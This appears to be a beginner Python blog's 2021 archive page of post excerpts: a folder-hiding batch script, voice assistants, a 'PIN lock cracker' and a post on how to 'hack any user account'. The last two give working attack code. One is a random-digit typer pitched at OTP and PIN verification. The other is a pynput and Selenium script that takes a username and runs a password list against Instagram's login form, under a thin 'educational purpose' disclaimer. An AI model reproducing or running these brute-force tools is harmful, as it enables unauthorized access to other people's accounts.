Posts

Showing posts from 2021

Make Folder Secure || using Batch file || Technology World

Image
Make Folder Secure || using Batch file || ComputerScienceWorld How to Secure Folder with some simple codes. Hello Programmers, Today we make an interesting program      this code will Make folders and Hide them, Save this code as (.bat) extensions How does the code Run??? 1. When you run the code, A pop-up will show.     those make your folder 2. Move your Files or Folder in this 3. Run it Again, and  Type Y for yes.      Your folder will vanish. 4. If you want it back, Run again the file and Type Password...     Default Password is 12345 codes are: @echo off title Folder Safe @REM cd /d D:/ (here you can fix the location of your file) if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Safe goto MDSafe :CONFIRM echo Are you sure. Do you want to lock the Folder (y/n) set /p sure= if %sure% == Y goto LOCK if %sure% == N goto END if %sure% == n goto END if %sure% == y goto LO...

How to make a PIN lock Cracker || with Python || by ComputerScienceWorld

Image
How to make a PIN lock Cracker ComputerScienceWorld Hello Python Users, Today, I will show you Awesome and Cool Project, PIN LOCK Cracker. Here, I also make an APK FILE of it. if you want to download it,                     Click Here In this Project, You need to install a Module "pip install pynput" in the .py file. When the program starts, Click on the input box where you want action on PC. from pynput.keyboard import Controller # All Modules import random, string, time # All Modules boad = Controller () nums = string.digits # All Numbers while nums :     runner = random.choice ( nums ) # Take a Random Number     print ( runner ) # Print Output     boad . type ( runner ) # type output     time . sleep (0.5) # for rest You can use it in SMS verifications, OTPs verifications, or any PIN lock If you apk or exe file of it. Click Here for apk.           Do y...

How to Make a Password List || Python Project || ComputerScienceWorld

Image
ComputerScienceWorld How To make Password List by using Python.

How to Hack any User Account || By using Python || ComputerScienceWorld

Image
ComputerScienceWorld How to Hack any User Account By using Python ***ONLY FOR EDUCATIONAL PURPOSE*** In the post, We will learn about How to Hack User account. In the process,  We Automatically  Login to the link with user account.     when we start it, the password list start action.      It guess and enter - guess and enter one by one... There are some simple command before start this attack... 1) Download & Install Python  latest  version (upper then 3.6 ) . 2) open any terminal (like : cmd, PowerShell, or any other) 3) type, pip install webbot and enter. browser helpe 4) type, pip install pynput and enter, auto-typing module     type, pip install webdriver || if chromedriver problem     type, pip install random || if random module occur error  also have a password list to make it attackable. if you have no password list go to my password list page, or if you have password list save it as psswd.txt ext...

Python Projects || Beginner Level ||

Image
Python Projects (easy) with ComputerScienceWorld  My All Practise or Experimental Python Files. Hello Python Users,      Here I have some basics and simple projects. Those can little help you to understanding python attributes and arguments There are 5 Projects those I Present  * Easy to Learn * Easy to Make. * Easy to use.

How to make Voice Assistant || Computer or Laptop Assistant || by Piyush Baghel

Image
Make your own Voice Assistant Code of Voice Assistant   Namaste Python Users,     Here we learn about how to make Voice Assistant at Home by using python code     In this Assistant,  you can change  commands   as your demand.     In the file, you get day wishes ("Good morning", "Good Evening", or "Good night") and callable functions like ("play music", "open Google", etc.) also can send mails by your account. Just speak send mail to "receiver".      And much more you can add to this file. Before using it Please install Python's latest version. then, save these codes as save as (. py ) is meant to save as. ❤❤❤👀👀 import   pyttsx3        #pip install pyttsx3 import   webbrowser     #pip install webbrowser import   datetime import   wikipedia      #pip install wikipedia import   os import   smtplib ...

BIOS Enter Buttons

Image
  code to try to crack Instagram ID from webbot import Browser from selenium import webdriver from pynput . keyboard import Key , Controller import time usern = input ( "Enter Your User Na" ) bruteforce = open ( 'psswd.txt' , 'r' ) web = webdriver . Chrome ( "C: \\ Users \\ piyush__18__ \\ Downloads\Compressed \\ chromedriver_win32 \\ chromedriver" ) kboard = Controller () # webb = Browser() web . get ( "https://www.instagram.com" ) time . sleep ( 5 ) kboard .press( Key .f6) kboard .release( Key .f6) time . sleep ( 5 ) kboard .press( Key .enter) kboard .release( Key .enter) time . sleep ( 5 ) kboard .press( Key .tab) kboard .release( Key .tab) time . sleep ( 5 ) kboard .type( usern ) kboard .press( Key .tab) kboard .release( Key .tab) time . sleep ( 5 ) for brute in bruteforce :     kboard .type( brute )     kboard .press( Key .enter)     kboard .release( Key .enter)     time . sleep ( 0.5 )     with kboard .presse...

Alexa with Python

Image
Make your own Alexa with Python | Python Beginner Some Basic Python Command to make AI-type Assistant... import   speech_recognition   as   sr import   pyttsx3 import   pywhatkit import   datetime import   wikipedia import   pyjokes listener  =  sr . Recognizer () engine  =  pyttsx3 . init () voices  =  engine . getProperty ( 'voices' ) engine . setProperty ( 'voice' ,  voices [ 1 ].id) def   talk ( text ):      engine . say ( text )      engine . runAndWait () def   take_command ():               with   sr . Microphone ()  as   source :              print ( 'listening...' )              voice  =  listener . listen ( source )       ...